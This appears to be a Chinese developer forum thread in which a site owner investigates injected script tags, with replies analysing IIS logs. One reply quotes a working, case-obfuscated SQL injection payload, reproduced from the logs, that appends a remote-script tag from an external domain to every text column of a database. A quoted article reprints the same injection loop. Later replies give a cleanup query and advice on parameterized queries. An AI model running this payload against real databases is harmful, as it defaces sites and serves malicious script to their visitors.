iis的日志,我看了下,没有找到关于 </title> </ </title> </pre>"> <script src=http://1.hao929.cn/ads.js> </script> <!-- 的关键字 的记录,其他的注入语句到不少,但都没成功,不指导最近有没有这方面 的黑客工具,会做到这些

解决方案 »

  1.   

    不知道怎么上传文件,我 想把IIs日志发上来,给大家看看,下午再说,先吃饭
      

  2.   

    找到一段;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x3C2F7469746C653E3C2F7072653E3E3C736372697074207372633D687474703A2F2F73622E353235322E77733A38382F3130372F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;--
      

  3.   

    找到一篇文章最近我的网站常被人挂马,我不知道为什么,我去掉了一段时间论坛,后来就没中了,仔细一分析,发现原来是数据库常被人挂马了.以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。SQL语句如下:用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)
    xtype=99 ntextxtype=35 textxtype=231 nvarcharxtype=167 varchar———————YD的分割——————————–DECLARE @T varchar(255),
    @C varchar(255)
    DECLARE Table_Cursor CURSOR FOR
    Select
    a.name,b.name
    from sysobjects a,
    syscolumns b
    where a.id=b.id and
    a.xtype=’u’ and
    (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
    exec(’update [’+@T+’] set [’+@C+’]=
    rtrim(convert(varchar,[’+@C+’]))+
    ”挂马内容”’)
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor
      

  4.   

    select 'update ' + b.[name] + ' set ' + a.[name] + '=replace(' + a.[name] + ',''</title></pre>"><script src=http://1.hao929.cn/ads.js></script><!--'','''')'
     from syscolumns as a,sysobjects as b where a.[id]=b.[id] and b.xtype='U' 
    and a.xtype in ('231','35','99','167','175') order by b.[name]
      

  5.   

    什么SQL注入...
    明明就是跨站攻击....................................................................
    楼主记得传参用sqlparameter
    还要过滤掉危险字符..象<script>之类的,想都不想就过滤了...或者给他替换成全角的.
      

  6.   

    怕怕。最近老是有人在说自己网站被黑。看来我新学做的几个非常烂的网站。都没SQL过滤。要好好抽时间去过滤下。唉,一直都明白这是很大漏洞都懒去改。看来真的是不行了。